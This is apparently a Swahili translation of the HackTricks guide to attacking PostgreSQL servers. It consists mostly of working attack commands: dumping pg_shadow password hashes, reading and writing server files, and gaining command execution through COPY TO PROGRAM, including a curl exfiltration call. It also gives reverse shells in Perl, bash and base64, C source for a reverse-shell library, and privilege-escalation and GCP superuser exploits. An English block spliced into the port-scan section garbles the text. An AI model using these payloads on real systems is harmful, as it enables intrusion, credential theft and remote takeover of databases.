# 5432,5433 - Kupima Usalama wa PostgreSQL
\ Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia** taratibu za kiotomatiki zilizotengenezwa na zana za jamii za **juu kabisa** duniani.\ Pata Ufikiaji Leo: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee * **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
## **Taarifa Msingi** **PostgreSQL** inaelezwa kama **mfumo wa hifadhidata wa kiuhusiano wa vitu** ambao ni **wa chanzo wazi**. Mfumo huu si tu unatumia lugha ya SQL bali pia unaboresha kwa vipengele vingine. Uwezo wake unaruhusu kushughulikia aina mbalimbali za data na operesheni, hivyo kuwa chaguo la kina kwa waendelezaji na mashirika. **Bandari ya msingi:** 5432, na ikiwa bandari hii tayari inatumika inaonekana kwamba postgresql itatumia bandari inayofuata (labda 5433) ambayo haipo katika matumizi. ``` PORT STATE SERVICE 5432/tcp open pgsql ``` ## Unganisha & Uchambuzi wa Msingi ```bash psql -U # Open psql console with user psql -h -U -d # Remote connection psql -h -p -U -W # Remote connection ``` ```sql psql -h localhost -d -U #Password will be prompted \list # List databases \c # use the database \d # List tables \du+ # Get users roles # Get current user SELECT user; # Get current database SELECT current_catalog; # List schemas SELECT schema_name,schema_owner FROM information_schema.schemata; \dn+ #List databases SELECT datname FROM pg_database; #Read credentials (usernames + pwd hash) SELECT usename, passwd from pg_shadow; # Get languages SELECT lanname,lanacl FROM pg_language; # Show installed extensions SHOW rds.extensions; SELECT * FROM pg_extension; # Get history of commands executed \s ``` {% hint style="warning" %} Ikiendesha **`\list`** na kupata database inaitwa **`rdsadmin`** unajua uko ndani ya **AWS postgresql database**. {% endhint %} Kwa habari zaidi kuhusu **jinsi ya kutumia vibaya database ya PostgreSQL** angalia: {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/" %} [postgresql-injection](../pentesting-web/sql-injection/postgresql-injection/) {% endcontent-ref %} ## Uchambuzi wa Kiotomatiki ``` msf> use auxiliary/scanner/postgres/postgres_version msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection ``` ### [**Kujaribu nguvu**](../generic-methodologies-and-resources/brute-force.md#postgresql) ### **Uchunguzi wa Port** Kulingana na [**utafiti huu**](https://www.exploit-db.com/papers/13084), wakati jaribio la uunganisho linashindwa, `dblink` hutoa kosa la `sqlclient_unable_to_establish_sqlconnection` pamoja na maelezo ya kosa. Mifano ya maelezo haya imeorodheshwa hapa chini. ```sql SELECT * FROM dblink_connect('host=1.2.3.4 port=5678 user=name password=secret dbname=abc connect_timeout=10'); ``` * Host imezimwa `MAELEZO: hakuweza kuunganisha kwenye seva: Hakuna njia ya kufikia mwenyeji Je, seva inaendeshwa kwenye mwenyeji "1.2.3.4" na kukubali mawasiliano ya TCP/IP kwenye bandari 5678?` * Bandari imefungwa ``` DETAIL: could not connect to server: Connection refused Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678? ``` * Bandari iko wazi ``` DETAIL: server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request ``` ### PostgreSQL #### Enumeration To enumerate PostgreSQL, you can use tools like `nmap` to scan for open ports and services. Use the following command to scan for PostgreSQL service: ```bash nmap -sV -p 5432 ``` #### Brute Forcing You can use tools like `Hydra` to perform brute force attacks on PostgreSQL. Use the following command to brute force the PostgreSQL login: ```bash hydra -L -P postgres ``` #### Default Credentials Always check for default credentials when pentesting PostgreSQL. Some common default credentials for PostgreSQL are: - Username: `postgres`, Password: `postgres` - Username: `admin`, Password: `admin` #### Exploitation Exploiting PostgreSQL involves leveraging vulnerabilities like SQL injection or weak authentication mechanisms. Always ensure you have proper authorization before attempting any exploitation. #### Post-Exploitation After exploiting PostgreSQL, you can perform various post-exploitation activities like accessing sensitive data, escalating privileges, or even creating backdoors for future access. Always document your post-exploitation steps for reporting and analysis. ``` DETAIL: FATAL: password authentication failed for user "name" ``` * Bandari imefunguliwa au kufanyiwa uchunguzi ``` DETAIL: could not connect to server: Connection timed out Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678? ``` Katika kazi za PL/pgSQL, kwa sasa haiwezekani kupata maelezo ya kipekee. Hata hivyo, ikiwa una ufikiaji wa moja kwa moja kwenye seva ya PostgreSQL, unaweza kupata habari muhimu. Ikiwa kuchimba majina ya watumiaji na nywila kutoka kwenye meza za mfumo sio jambo linalowezekana, unaweza kuzingatia kutumia njia ya mashambulizi ya orodha ya maneno iliyozungumziwa katika sehemu iliyotangulia, kwani inaweza kutoa matokeo chanya. ## Uorodheshaji wa Haki ### Majukumu | Aina za Majukumu | | | -------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------- | | rolsuper | Jukumu lina haki za msimamizi wa mfumo | | rolinherit | Jukumu linarithi moja kwa moja haki za majukumu ambayo ni wanachama wake | | rolcreaterole | Jukumu linaweza kuunda majukumu zaidi | | rolcreatedb | Jukumu linaweza kuunda mabadiliko | | rolcanlogin | Jukumu linaweza kuingia. Yaani, jukumu hili linaweza kutolewa kama kitambulisho cha idhini ya kikao cha awali | | rolreplication | Jukumu ni jukumu la kuzaliana. Jukumu la kuzaliana linaweza kuanzisha uhusiano wa kuzaliana na kuunda na kuondoa vipande vya kuzaliana. | | rolconnlimit | Kwa majukumu yanayoweza kuingia, hii inaweka idadi kubwa ya uhusiano wa wakati mmoja ambao jukumu hili linaweza kufanya. -1 inamaanisha hakuna kikomo. | | rolpassword | Sio nywila (siku zote inasomwa kama `********`) | | rolvaliduntil | Muda wa kumalizika kwa nywila (inatumika tu kwa uthibitishaji wa nywila); null ikiwa hakuna kumalizika | | rolbypassrls | Jukumu linapuuza sera ya usalama wa ngazi ya safu, angalia [Sehemu 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) kwa maelezo zaidi. | | rolconfig | Chaguo-msingi la jukumu kwa mazingira ya muda wa kukimbia | | oid | Kitambulisho cha jukumu | #### Vikundi Vinavyovutia * Ikiwa wewe ni mwanachama wa **`pg_execute_server_program`** unaweza **kutekeleza** programu * Ikiwa wewe ni mwanachama wa **`pg_read_server_files`** unaweza **kusoma** faili * Ikiwa wewe ni mwanachama wa **`pg_write_server_files`** unaweza **kuandika** faili {% hint style="info" %} Tafadhali kumbuka kwamba katika Postgres **mtumiaji**, **kikundi** na **jukumu** ni **sawa**. Inategemea tu **jinsi unavyoitumia** na ikiwa **kuruhusu kuingia**. {% endhint %} ```sql # Get users roles \du #Get users roles & groups # r.rolpassword # r.rolconfig, SELECT r.rolname, r.rolsuper, r.rolinherit, r.rolcreaterole, r.rolcreatedb, r.rolcanlogin, r.rolbypassrls, r.rolconnlimit, r.rolvaliduntil, r.oid, ARRAY(SELECT b.rolname FROM pg_catalog.pg_auth_members m JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid) WHERE m.member = r.oid) as memberof , r.rolreplication FROM pg_catalog.pg_roles r ORDER BY 1; # Check if current user is superiser ## If response is "on" then true, if "off" then false SELECT current_setting('is_superuser'); # Try to grant access to groups ## For doing this you need to be admin on the role, superadmin or have CREATEROLE role (see next section) GRANT pg_execute_server_program TO "username"; GRANT pg_read_server_files TO "username"; GRANT pg_write_server_files TO "username"; ## You will probably get this error: ## Cannot GRANT on the "pg_write_server_files" role without being a member of the role. # Create new role (user) as member of a role (group) CREATE ROLE u LOGIN PASSWORD 'lriohfugwebfdwrr' IN GROUP pg_read_server_files; ## Common error ## Cannot GRANT on the "pg_read_server_files" role without being a member of the role. ``` ### Meza ```sql # Get owners of tables select schemaname,tablename,tableowner from pg_tables; ## Get tables where user is owner select schemaname,tablename,tableowner from pg_tables WHERE tableowner = 'postgres'; # Get your permissions over tables SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants; #Check users privileges over a table (pg_shadow on this example) ## If nothing, you don't have any permission SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow'; ``` ### Kazi ```sql # Interesting functions are inside pg_catalog \df * #Get all \df *pg_ls* #Get by substring \df+ pg_read_binary_file #Check who has access # Get all functions of a schema \df pg_catalog.* # Get all functions of a schema (pg_catalog in this case) SELECT routines.routine_name, parameters.data_type, parameters.ordinal_position FROM information_schema.routines LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name WHERE routines.specific_schema='pg_catalog' ORDER BY routines.routine_name, parameters.ordinal_position; # Another aparent option SELECT * FROM pg_proc; ``` ## Vitendo vya mfumo wa faili ### Soma saraka na faili Kutoka kwa hii [**commit**](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) wanachama wa kikundi kilichofafanuliwa **`DEFAULT_ROLE_READ_SERVER_FILES`** (kinachoitwa **`pg_read_server_files`**) na **watumiaji wa juu** wanaweza kutumia njia ya **`COPY`** kwenye njia yoyote (angalia `convert_and_check_filename` katika `genfile.c`): ```sql # Read file CREATE TABLE demo(t text); COPY demo from '/etc/passwd'; SELECT * FROM demo; ``` {% hint style="warning" %} Kumbuka kwamba ikiwa wewe si mtumiaji wa juu lakini una ruhusa za **CREATEROLE** unaweza **kujifanya kuwa mwanachama wa kikundi hicho:** ```sql GRANT pg_read_server_files TO username; ``` [**Maelezo zaidi.**](pentesting-postgresql.md#privilege-escalation-with-createrole) {% endhint %} Kuna **kazi zingine za postgres** ambazo zinaweza kutumika kusoma **faili au kuorodhesha saraka**. Ni **watumiaji wa superusers** na **watumiaji wenye idhini wazi** pekee wanaweza kuzitumia: ```sql # Before executing these function go to the postgres DB (not in the template1) \c postgres ## If you don't do this, you might get "permission denied" error even if you have permission select * from pg_ls_dir('/tmp'); select * from pg_read_file('/etc/passwd', 0, 1000000); select * from pg_read_binary_file('/etc/passwd'); # Check who has permissions \df+ pg_ls_dir \df+ pg_read_file \df+ pg_read_binary_file # Try to grant permissions GRANT EXECUTE ON function pg_catalog.pg_ls_dir(text) TO username; # By default you can only access files in the datadirectory SHOW data_directory; # But if you are a member of the group pg_read_server_files # You can access any file, anywhere GRANT pg_read_server_files TO username; # Check CREATEROLE privilege escalation ``` Unaweza kupata **kazi zaidi** katika [https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html) ### Kuandika Faili Rahisi Ni **watumiaji wa juu** tu na wanachama wa **`pg_write_server_files`** wanaweza kutumia nakala kuandika faili. ```sql copy (select convert_from(decode('','base64'),'utf-8')) to '/just/a/path.exec'; ``` {% endcode %} {% hint style="warning" %} Kumbuka kwamba ikiwa wewe si mtumiaji wa juu lakini una ruhusa za **`CREATEROLE`** unaweza **kujifanya kuwa mwanachama wa kikundi hicho:** ```sql GRANT pg_write_server_files TO username; ``` [**Maelezo zaidi.**](pentesting-postgresql.md#privilege-escalation-with-createrole) {% endhint %} Kumbuka kwamba COPY hawezi kushughulikia herufi za mstari mpya, hivyo hata kama unatumia mzigo wa base64 **unahitaji kutuma mstari mmoja**.\ Kikwazo muhimu sana cha mbinu hii ni kwamba **`copy` haitumiki kuandika faili za binary kwani inabadilisha baadhi ya thamani za binary.** ### **Kuweka faili za binary** Hata hivyo, kuna **mbinu nyingine za kupakia faili kubwa za binary:** {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md" %} [big-binary-files-upload-postgresql.md](../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md) {% endcontent-ref %} ## **Mwongozo wa tuzo ya mdudu**: **jiandikishe** kwa **Intigriti**, jukwaa la **tuzo za mdudu za malipo lililoundwa na wadukuzi, kwa wadukuzi**! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata tuzo hadi **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} ### Kuboresha data ya meza ya PostgreSQL kupitia kuandika faili za ndani Ikiwa una ruhusa zinazohitajika kusoma na kuandika faili za seva za PostgreSQL, unaweza kuboresha meza yoyote kwenye seva kwa **kuandika upya faili inayohusiana** katika [directory ya data ya PostgreSQL](https://www.postgresql.org/docs/8.1/storage.html). **Zaidi kuhusu mbinu hii** [**hapa**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users). Hatua zinazohitajika: 1. Pata directory ya data ya PostgreSQL ```sql SELECT setting FROM pg_settings WHERE name = 'data_directory'; ``` **Maelezo:** Ikiwa huwezi kupata njia ya sasa ya directory ya data kutoka kwa mipangilio, unaweza kuuliza toleo kuu la PostgreSQL kupitia swali la `SELECT version()` na jaribu kubadilisha njia. Njia za kawaida za directory ya data kwenye ufungaji wa Unix wa PostgreSQL ni `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`. Jina la kawaida la kikundi ni `main`. 2. Pata njia ya kihusiano kwa filenode, inayohusiana na meza ya lengo ```sql SELECT pg_relation_filepath('{JINA_LA_MEZA}') ``` Swali hili linapaswa kurudi kitu kama `base/3/1337`. Njia kamili kwenye diski itakuwa `$DIRECTORY_DATA/base/3/1337`, yaani `/var/lib/postgresql/13/main/base/3/1337`. 3. Pakua filenode kupitia kazi za `lo_*` ```sql SELECT lo_import('{PSQL_DIRECTORY_DATA}/{NJIA_YA_KIHUSIANO}',13337) ``` 4. Pata aina ya data, inayohusiana na meza ya lengo ```sql SELECT STRING_AGG( CONCAT_WS( ',', attname, typname, attlen, attalign ), ';' ) FROM pg_attribute JOIN pg_type ON pg_attribute.atttypid = pg_type.oid JOIN pg_class ON pg_attribute.attrelid = pg_class.oid WHERE pg_class.relname = '{JINA_LA_MEZA}'; ``` 5. Tumia [Mhariri wa Filenode wa PostgreSQL](https://github.com/adeadfed/postgresql-filenode-editor) kuhariri filenode; weka bendera zote za boolean za `rol*` kuwa 1 kwa ruhusa kamili. ```bash python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {AINA_YA_DATA_KUTOKA_HATUA_4} -m update -p 0 -i ITEM_ID --csv-data {DATA_YA_CSV} ``` ![Onyesho la Mhariri wa Filenode wa PostgreSQL](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo\_datatype.gif) 6. Pakia tena filenode iliyohaririwa kupitia kazi za `lo_*`, na uandike upya faili ya asili kwenye diski ```sql SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64')) SELECT lo_export(13338,'{PSQL_DIRECTORY_DATA}/{NJIA_YA_KIHUSIANO}') ``` 7. _(Hiari)_ Futa cache ya meza kwenye kumbukumbu kwa kukimbia swali la SQL lenye gharama kubwa ```sql SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea) ``` 8. Sasa unapaswa kuona thamani za meza zilizosasishwa kwenye PostgreSQL. Unaweza pia kuwa superadmin kwa kuhariri meza ya `pg_authid`. **Tazama** [**sehemu ifuatayo**](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables). ## RCE ### **RCE kwa programu** Tangu [toleo 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), tu **watumiaji wa super** na wanachama wa kikundi cha **`pg_execute_server_program`** wanaweza kutumia nakala kwa RCE (mfano na utekelezaji: ```sql '; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- - ``` Mfano wa kutekeleza: ```bash #PoC DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec; DROP TABLE IF EXISTS cmd_exec; #Reverse shell #Notice that in order to scape a single quote you need to put 2 single quotes COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'''; ``` {% hint style="warning" %} Kumbuka kwamba ikiwa wewe si mtumiaji wa juu lakini una ruhusa za **`CREATEROLE`** unaweza **kujifanya kuwa mwanachama wa kikundi hicho:** ```sql GRANT pg_execute_server_program TO username; ``` [**Maelezo zaidi.**](pentesting-postgresql.md#privilege-escalation-with-createrole) {% endhint %} Au tumia moduli ya `multi/postgres/postgres_copy_from_program_cmd_exec` kutoka **metasploit**.\ Maelezo zaidi kuhusu udhaifu huu yanapatikana [**hapa**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). Ingawa iliripotiwa kama CVE-2019-9193, Postges ilieleza kuwa hii ilikuwa [sifa na haitasahihishwa](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/). ### RCE na Lugha za PostgreSQL {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md" %} [rce-with-postgresql-languages.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md) {% endcontent-ref %} ### RCE na Vifaa vya PostgreSQL Baada ya **kujifunza** kutoka kwenye chapisho la awali **jinsi ya kupakia faili za binary** unaweza jaribu kupata **RCE kwa kupakia kifaa cha postgresql na kulipakia**. {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md" %} [rce-with-postgresql-extensions.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md) {% endcontent-ref %} ### RCE kwa Faili ya Usanidi wa PostgreSQL {% hint style="info" %} Vectors za RCE zifuatazo ni muhimu sana katika muktadha wa SQLi uliopunguzwa, kwani hatua zote zinaweza kutekelezwa kupitia taarifa za SELECT zilizofungwa {% endhint %} **Faili ya usanidi** ya PostgreSQL inaweza **kuandikwa** na **mtumiaji wa postgres**, ambaye ndiye anayesimamia hifadhidata, hivyo kama **mtumiaji wa superuser**, unaweza kuandika faili kwenye mfumo wa faili, na hivyo unaweza **kuiandika upya faili hii.** ![](<../.gitbook/assets/image (303).png>) #### **RCE na ssl\_passphrase\_command** Maelezo zaidi [kuhusu mbinu hii hapa](https://pulsesecurity.co.nz/articles/postgres-sqli). Faili ya usanidi ina sifa za kuvutia ambazo zinaweza kusababisha RCE: * `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Njia ya funguo ya kibinafsi ya hifadhidata * `ssl_passphrase_command = ''` Ikiwa faili ya kibinafsi inalindwa na nenosiri (imefichwa) postgresql ita **tekeleza amri iliyotajwa katika sifa hii**. * `ssl_passphrase_command_supports_reload = off` **Ikiwa** sifa hii iko **on** amri itatekelezwa ikiwa funguo inalindwa na nenosiri **itaendeshwa** wakati `pg_reload_conf()` inatekelezwa. Kisha, mshambuliaji atahitaji: 1. **Dump funguo ya kibinafsi** kutoka kwenye seva 2. **Ficha** funguo ya kibinafsi iliyopakuliwa: 1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key` 3. **Andika upya** 4. **Dump** usanidi wa sasa wa postgresql 5. **Andika upya** **usanidi** na usanidi wa sifa zilizotajwa: 1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'` 2. `ssl_passphrase_command_supports_reload = on` 6. Tekeleza `pg_reload_conf()` Nilipokuwa nikijaribu hii niligundua kuwa hii itafanya kazi tu ikiwa **faili ya funguo ya kibinafsi ina ruhusa 640**, ni **mali ya root** na **kikundi cha ssl-cert au postgres** (hivyo mtumiaji wa postgres anaweza kuisoma), na iko katika _/var/lib/postgresql/12/main_. #### **RCE na archive\_command** **Maelezo zaidi** [**kuhusu usanidi huu na kuhusu WAL hapa**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**.** Sifa nyingine katika faili ya usanidi ambayo inaweza kutumiwa ni `archive_command`. Ili hii ifanye kazi, mipangilio ya `archive_mode` lazima iwe `'on'` au `'always'`. Ikiwa hivyo ndivyo, basi tunaweza kuandika upya amri katika `archive_command` na kuiruhusu kutekelezwa kupitia operesheni za WAL (kuandika mbele kabla) za kumbukumbu. Hatua kuu ni: 1. Angalia ikiwa mode ya kumbukumbu imeanzishwa: `SELECT current_setting('archive_mode')` 2. Andika upya `archive_command` na mzigo. Kwa mfano, kabati la nyuma: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'` 3. Pakia upya usanidi: `SELECT pg_reload_conf()` 4. Kulazimisha operesheni ya WAL ifanye kazi, ambayo itaita amri ya kumbukumbu: `SELECT pg_switch_wal()` au `SELECT pg_switch_xlog()` kwa baadhi ya toleo za Postgres #### **RCE na maktaba za kubeba mapema** Maelezo zaidi [kuhusu mbinu hii hapa](https://adeadfed.com/posts/postgresql-select-only-rce/). Kipengele hiki cha shambulio kinatumia vipimo vifuatavyo vya usanidi: * `session_preload_libraries` - maktaba ambazo zitapakiwa na seva ya PostgreSQL wakati wa uunganisho wa mteja. * `dynamic_library_path` - orodha ya saraka ambapo seva ya PostgreSQL itatafuta maktaba. Tunaweza kuweka thamani ya `dynamic_library_path` kwa saraka, inayoweza kuandikwa na mtumiaji wa `postgres` anayesimamia hifadhidata, k.m., saraka ya `/tmp/`, na kupakia kitu cha `.so` chenye nia mbaya hapo. Kisha, tutalazimisha seva ya PostgreSQL kupakia maktaba yetu mpya iliyopakiwa kwa kuijumuisha katika thamani ya `session_preload_libraries`. Hatua za shambulio ni: 1. Pakua `postgresql.conf` ya asili 2. Jumuisha saraka ya `/tmp/` katika thamani ya `dynamic_library_path`, k.m. `dynamic_library_path = '/tmp:$libdir'` 3. Jumuisha jina la maktaba ya nia mbaya katika thamani ya `session_preload_libraries`, k.m. `session_preload_libraries = 'payload.so'` 4. Angalia toleo kuu la PostgreSQL kupitia swali la `SELECT version()` 5. K compile kanuni ya maktaba ya nia mbaya na pakiti sahihi ya maendeleo ya PostgreSQL Kanuni ya sampuli: ```c #include #include #include #include #include #include #include #include "postgres.h" #include "fmgr.h" #ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; #endif void _init() { /* kanuni inachukuliwa kutoka https://www.revshells.com/ */ int port = REVSHELL_PORT; struct sockaddr_in revsockaddr; int sockt = socket(AF_INET, SOCK_STREAM, 0); revsockaddr.sin_family = AF_INET; revsockaddr.sin_port = htons(port); revsockaddr.sin_addr.s_addr = inet_addr("REVSHELL_IP"); connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)); dup2(sockt, 0); dup2(sockt, 1); dup2(sockt, 2); char * const argv[] = {"/bin/bash", NULL}; execve("/bin/bash", argv, NULL); } ``` Kukusanya kanuni: ```bash gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c ``` 6. Pakia `postgresql.conf` ya nia mbaya, iliyoandaliwa katika hatua 2-3, na iandike upya ile ya asili 7. Pakia `payload.so` kutoka hatua 5 kwenye saraka ya `/tmp` 8. Pakia upya usanidi wa seva kwa kuanzisha upya seva au kuita swali la `SELECT pg_reload_conf()` 9. Kwenye uunganisho ujao wa DB, utapokea uunganisho wa kabati la nyuma. ## **Postgres Privesc** ### **Kuongeza Haki** Kulingana na [**hati**](https://www.postgresql.org/docs/13/sql-grant.html): _Vitu vyenye **`CREATEROLE`** haki wanaweza **kutoa au kurejesha uanachama katika jukumu lolote** ambalo **si** mtumiaji **mkuu**._ Kwa hivyo, ikiwa una **ruhusa ya `CREATEROLE`** unaweza kujipa ufikiaji wa majukumu mengine (ambayo si mtumiaji mkuu) ambayo yanaweza kukupa chaguo la kusoma na kuandika faili na kutekeleza amri: ```sql # Access to execute commands GRANT pg_execute_server_program TO username; # Access to read files GRANT pg_read_server_files TO username; # Access to write files GRANT pg_write_server_files TO username; ``` #### Badilisha Nenosiri Watumiaji wenye jukumu hili wanaweza pia **kubadilisha** **nenosiri** za watumiaji wengine **wasio wa kiwango cha juu**: ```sql #Change password ALTER USER user_name WITH PASSWORD 'new_password'; ``` #### Kupanda hadhi kuwa SUPERUSER Ni kawaida sana kukuta kwamba **watumiaji wa ndani wanaweza kuingia kwenye PostgreSQL bila kutoa nenosiri lolote**. Kwa hivyo, mara tu unapokusanya **ruhusa ya kutekeleza nambari**, unaweza kutumia ruhusa hizi kujipatia jukumu la **`SUPERUSER`**: ```sql COPY (select '') to PROGRAM 'psql -U -c "ALTER USER WITH SUPERUSER;"'; ``` {% hint style="info" %} Hii kawaida inawezekana kwa sababu ya mistari ifuatayo katika faili ya **`pg_hba.conf`**: ```bash # "local" is for Unix domain socket connections only local all all trust # IPv4 local connections: host all all 127.0.0.1/32 trust # IPv6 local connections: host all all ::1/128 trust ``` {% endhint %} ### **KUBADILISHA JEDWALI LA privesc** Katika [**makala hii**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) imeelezwa jinsi ilivyowezekana kufanya **privesc** katika Postgres GCP kwa kutumia mamlaka ya ALTER TABLE ambayo ilikuwa imeruhusiwa kwa mtumiaji. Unapojaribu **kufanya mtumiaji mwingine kuwa mmiliki wa jedwali** unapaswa kupata **kosa** linalozuia hilo, lakini inaonekana GCP iliruhusu **chaguo hilo kwa mtumiaji wa postgres asiye mtumiaji wa superuser** katika GCP:
Kwa kuunganisha wazo hili na ukweli kwamba wakati wa kutekeleza amri za **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) kwenye **jedwali lenye kazi ya index**, **kazi** inaitwa kama sehemu ya amri hiyo kwa **mamlaka ya mmiliki wa jedwali**. Inawezekana kuunda index na kazi na kumpa mamlaka ya mmiliki kwa **mtumiaji wa super** juu ya jedwali hilo, kisha kutekeleza ANALYZE kwenye jedwali na kazi ya madhara ambayo itaweza kutekeleza amri kwa sababu inatumia mamlaka ya mmiliki. ```c GetUserIdAndSecContext(&save_userid, &save_sec_context); SetUserIdAndSecContext(onerel->rd_rel->relowner, save_sec_context | SECURITY_RESTRICTED_OPERATION); ``` #### Utekaji 1. Anza kwa kuunda meza mpya. 2. Ingiza baadhi ya maudhui yasiyofaa kwenye meza ili kutoa data kwa kazi ya index. 3. Endeleza kazi ya index yenye nia mbaya ambayo ina kifurushi cha utekelezaji wa nambari, kuruhusu amri zisizoidhinishwa kutekelezwa. 4. BADILISHA mmiliki wa meza kuwa "cloudsqladmin," ambayo ni jukumu la superuser la GCP linalotumiwa pekee na Cloud SQL kusimamia na kudumisha database. 5. Tekeleza operesheni ya ANALYZE kwenye meza. Hatua hii inalazimisha injini ya PostgreSQL kubadilisha muktadha wa mtumiaji wa mmiliki wa meza, "cloudsqladmin." Kwa hivyo, kazi ya index yenye nia mbaya inaitwa kwa ruhusa za "cloudsqladmin," hivyo kuruhusu utekelezaji wa amri ya kabla ya hapo isiyoidhinishwa. Katika PostgreSQL, mchakato huu unaonekana kama hivi: ```sql CREATE TABLE temp_table (data text); CREATE TABLE shell_commands_results (data text); INSERT INTO temp_table VALUES ('dummy content'); /* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */ CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text LANGUAGE sql IMMUTABLE AS 'select ''nothing'';'; CREATE INDEX index_malicious ON public.temp_table (suid_function(data)); ALTER TABLE temp_table OWNER TO cloudsqladmin; /* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */ CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';'; ANALYZE public.temp_table; ``` Kisha, meza ya `shell_commands_results` italeta matokeo ya nambari iliyotekelezwa: ``` uid=2345(postgres) gid=2345(postgres) groups=2345(postgres) ``` ### Kuingia Kwa Kitaifa Baadhi ya mifano ya postgresql iliyopangwa vibaya inaweza kuruhusu kuingia kwa mtumiaji yeyote wa ndani, inawezekana kuingia kutoka 127.0.0.1 kwa kutumia **`dblink` function**: ```sql \du * # Get Users \l # Get databases SELECT * FROM dblink('host=127.0.0.1 port=5432 user=someuser password=supersecret dbname=somedb', 'SELECT usename,passwd from pg_shadow') RETURNS (result TEXT); ``` {% hint style="warning" %} Tafadhali kumbuka kwamba ili kazi ya awali ifanye kazi **kazi ya `dblink` inahitajika kuwepo**. Ikiwa haipo, unaweza kujaribu kuunda kazi hiyo na ```sql CREATE EXTENSION dblink; ``` {% endhint %} Ikiwa una nenosiri la mtumiaji mwenye mamlaka zaidi, lakini 